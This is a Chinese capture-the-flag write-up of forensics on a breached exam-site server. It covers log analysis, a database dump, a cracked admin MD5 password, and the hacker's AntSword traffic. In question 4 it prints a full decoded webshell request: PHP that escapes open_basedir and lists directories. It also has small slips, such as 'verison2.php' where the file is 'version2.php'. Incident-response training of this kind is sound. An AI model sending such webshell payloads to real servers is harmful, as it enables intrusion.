# 题目 1
通过本地 PC SSH 到服务器并且分析黑客的 IP 为多少,将黑客 IP 作为 FLAG 提交;
[root@ip-10-0-10-2 ~]# cat /www/wwwlogs/access.log | cut -d" " -f1 | sort | uniq -c | |
456 127.0.0.1 | |
114 192.168.20.1 |
flag: flag{192.168.20.1}
# 题目 2
通过本地 PC SSH 到服务器并且分析黑客修改的管理员密码 (明文) 为多少,将黑客修改的管理员密码 (明文) 作为 FLAG 提交;
直接去数据库里读
[root@ip-10-0-10-2 ~]# cat /www/wwwroot/127.0.0.1/lib/config.inc.php | |
... | |
/** 数据库设置 */ | |
define('SQLDEBUG',0); | |
define('DB','kaoshi');//MYSQL数据库名 | |
define('DH','127.0.0.1');//MYSQL主机名,不用改 | |
define('DU','kaoshi');//MYSQL数据库用户名 | |
define('DP','5Sx8mK5ieyLPb84m');//MYSQL数据库用户密码 | |
define('DTH','x2_');//系统表前缀,不用改 | |
... |
[root@ip-10-0-10-2 ~]# mysql -h 127.0.0.1 -u kaoshi -p5Sx8mK5ieyLPb84m | |
mysql: [Warning] Using a password on the command line interface can be insecure. | |
Welcome to the MySQL monitor. Commands end with ; or \g. | |
Your MySQL connection id is 9 | |
Server version: 5.7.44-log Source distribution | |
Copyright (c) 2000, 2023, Oracle and/or its affiliates. | |
Oracle is a registered trademark of Oracle Corporation and/or its | |
affiliates. Other names may be trademarks of their respective | |
owners. | |
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. | |
mysql> use kaoshi; | |
Database changed | |
mysql> show tables; | |
+---------------------+ | |
| Tables_in_kaoshi | | |
+---------------------+ | |
| x2_answer | | |
| x2_app | | |
| x2_area | | |
| x2_ask | | |
| x2_attach | | |
| x2_attachtype | | |
| x2_basic | | |
| x2_block | | |
| x2_category | | |
| x2_cequeue | | |
| x2_certificate | | |
| x2_city | | |
| x2_cityarea | | |
| x2_cnttouser | | |
| x2_comment | | |
| x2_config | | |
| x2_consumelog | | |
| x2_content | | |
| x2_coupon | | |
| x2_course | | |
| x2_coursesubject | | |
| x2_docfloder | | |
| x2_dochistory | | |
| x2_docs | | |
| x2_examhistory | | |
| x2_exams | | |
| x2_examsession | | |
| x2_exercise | | |
| x2_favor | | |
| x2_feedback | | |
| x2_knows | | |
| x2_log | | |
| x2_module | | |
| x2_module_fields | | |
| x2_navs | | |
| x2_openbasics | | |
| x2_opencourse | | |
| x2_orders | | |
| x2_poscontent | | |
| x2_position | | |
| x2_progress | | |
| x2_province | | |
| x2_quest2knows | | |
| x2_questionanalysis | | |
| x2_questionrows | | |
| x2_questions | | |
| x2_questype | | |
| x2_record | | |
| x2_recorddata | | |
| x2_reply | | |
| x2_sections | | |
| x2_seminar | | |
| x2_seminar_content | | |
| x2_seminar_elem | | |
| x2_seminar_layout | | |
| x2_seminar_tpls | | |
| x2_session | | |
| x2_subject | | |
| x2_user | | |
| x2_user_group | | |
| x2_wxlogin | | |
+---------------------+ | |
61 rows in set (0.00 sec) | |
mysql> select * from x2_user_group; | |
+---------+--------------+---------------+---------------+------------+--------------------+--------------+ | |
| groupid | groupname | groupmoduleid | groupdescribe | groupright | groupmoduledefault | groupdefault | | |
+---------+--------------+---------------+---------------+------------+--------------------+--------------+ | |
| 1 | 管理员 | 1 | 管理员 | | 1 | 0 | | |
| 8 | 普通用户 | 9 | 普通用户 | | 0 | 1 | | |
| 9 | 教师 | 12 | 教师 | | 0 | 0 | | |
+---------+--------------+---------------+---------------+------------+--------------------+--------------+ | |
3 rows in set (0.04 sec) | |
mysql> select * from x2_user; | |
+--------+------------+-------------+-----------------+----------------+----------------------------------+----------+----------------+-------------+-------------+----------------+-------------+--------------+------------+------------------------------------------------------------------------------------------------------------------------------+--------------------+--------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------------+------------+-----------+-------------+---------------------------------------------------------+------------+------------+ | |
| userid | useropenid | userunionid | username | useremail | userpassword | usercoin | userregip | userregtime | userlogtime | userverifytime | usergroupid | usermoduleid | useranswer | manager_apps | usertruename | normal_favor | teacher_subjects | userprofile | usergender | userphone | useraddress | userphoto | userstatus | normal_sfz | | |
+--------+------------+-------------+-----------------+----------------+----------------------------------+----------+----------------+-------------+-------------+----------------+-------------+--------------+------------+------------------------------------------------------------------------------------------------------------------------------+--------------------+--------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------------+------------+-----------+-------------+---------------------------------------------------------+------------+------------+ | |
| 1 | | NULL | peadmin | 958074@163.com | f6f6eb5ace977d7e114377cc7098b7e3 | 279 | 127.0.0.1 | 1471795200 | 0 | NULL | 1 | 0 | NULL | a:7:{i:0;s:4:"user";i:1;s:7:"content";i:2;s:4:"exam";i:3;s:8:"document";i:4;s:6:"course";i:5;s:4:"bank";i:6;s:8:"autoform";} | 111111111111111111 | | | | 男 | | 信息部 | files/attach/images/content/20230802/16909740072788.jpg | 3 | | | |
| 2 | | NULL | 教师管理员 | 958074@126.com | 96e79218965eb72c92a549dd5a330112 | 98 | 127.0.0.1 | 1471795200 | 0 | NULL | 9 | 0 | NULL | | 213123 | | a:14:{i:0;s:2:"13";i:1;s:2:"12";i:2;s:1:"5";i:3;s:1:"4";i:4;s:1:"3";i:5;s:1:"1";i:6;s:1:"2";i:7;s:2:"17";i:8;s:2:"15";i:9;s:2:"16";i:10;s:2:"18";i:11;s:2:"19";i:12;s:2:"20";i:13;s:2:"21";} | 77777 | | | | | 3 | | | |
| 3 | | | zgsf | [email protected] | af0c68603004a1b5af4d87a71a813057 | 0 | 192.168.20.131 | 1709795218 | 0 | 0 | 8 | 0 | | | | | | | | | | | 0 | | | |
| 4 | | | zgsfAdmin | [email protected] | ed2b3e3ce2425550d8bfdea8b80cc89a | 0 | 192.168.20.131 | 1709796233 | 0 | 0 | 8 | 0 | | | | | | | | | | | 0 | | | |
+--------+------------+-------------+-----------------+----------------+----------------------------------+----------+----------------+-------------+-------------+----------------+-------------+--------------+------------+------------------------------------------------------------------------------------------------------------------------------+--------------------+--------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------------+------------+-----------+-------------+---------------------------------------------------------+------------+------------+ | |
4 rows in set (0.00 sec) |
pedadmin 是管理员,因为用户 ID 是 1
MD5 f6f6eb5ace977d7e114377cc7098b7e3 解开为: Network@2020
flag: flag{Network@2020}
# 题目 3
通过本地 PC SSH 到服务器并且分析黑客第一次 Webshell 的连接 URL 为多少,将黑客第一次 Webshell 的连接 URL 作为 FLAG 提交 (无需域名 flag {xxx.php?abc-app-upload});
网站扫了一下没扫出来
看到有 pcap 流量包下载下来 wireshark 看一眼
http 过滤后一看吓一跳
点开看下流量
一眼蚁剑
flag: flag{index.php?user-app-register}
# 题目 4
通过本地 PC SSH 到服务器并且分析黑客 Webshell 连接密码多少,将黑客 Webshell 连接密码 作为 FLAG 提交;
把流量 URL 解码一下
Network2020=@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.effe42";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "37de"."699c";echo @asenc($output);echo "e28ef"."b7f3d";}ob_start();try{$D=base64_decode(substr($_POST["x0b6b31b98f31d"],2));$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R=" ".$T." ".@filesize($P)." ".$E." | |
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();&x0b6b31b98f31d=fEL3d3dy93d3dyb290LzEyNy4wLjAuMS8= |
flag: flag{Network2020}
# 题目 5
通过本地 PC SSH 到服务器并且分析黑客使用的后续上传的木马文件名称为多少,将黑客使用的后续上传的木马文件名称 作为 FLAG 提交;
看了一下 history
50 ls | |
51 rm -rf flag1 1 | |
52 ls | |
53 rm -rf version2.php | |
54 ls | |
55 hardlink | |
56 hwclock | |
57 ls | |
58 docker ps | |
59 rm -rf pe9.sql |
试了一下 flag1,不行
流量里有 version2.php,试了可以
flag: flag{verison2.php}
# 题目 6
通过本地 PC SSH 到服务器并且分析黑客隐藏的 flag2, 将黑客使隐藏的 flag2 作为 FLAG 提交;
看了一下 history,发现了修改了文件
89 ls | |
90 cd .api/ | |
91 ls | |
92 vim mpnotify.php | |
93 yum install vim | |
94 ls | |
95 vim alinotify.php |
[root@ip-10-0-10-2 ~]# cat -n /www/wwwroot/127.0.0.1/.api/alinotify.php | |
... | |
55 include PEPATH.'/lib/init.cls.php'; | |
56 $app = new app(new ginkgo); | |
57 $app->run(); | |
58 $flag2 = "flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}"; | |
... |
flag: flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}
# 题目 7
通过本地 PC SSH 到服务器并且分析黑客隐藏的 flag3, 将黑客使隐藏的 flag3 作为 FLAG 提交;
看了一下 history,发现 flag3
102 $flag3 = [root@web-server .api]# useradd flag3{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ} | |
103 useradd: invalid user name 'flag3{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}' | |
104 $flag3 = flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ} |
flag: flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}
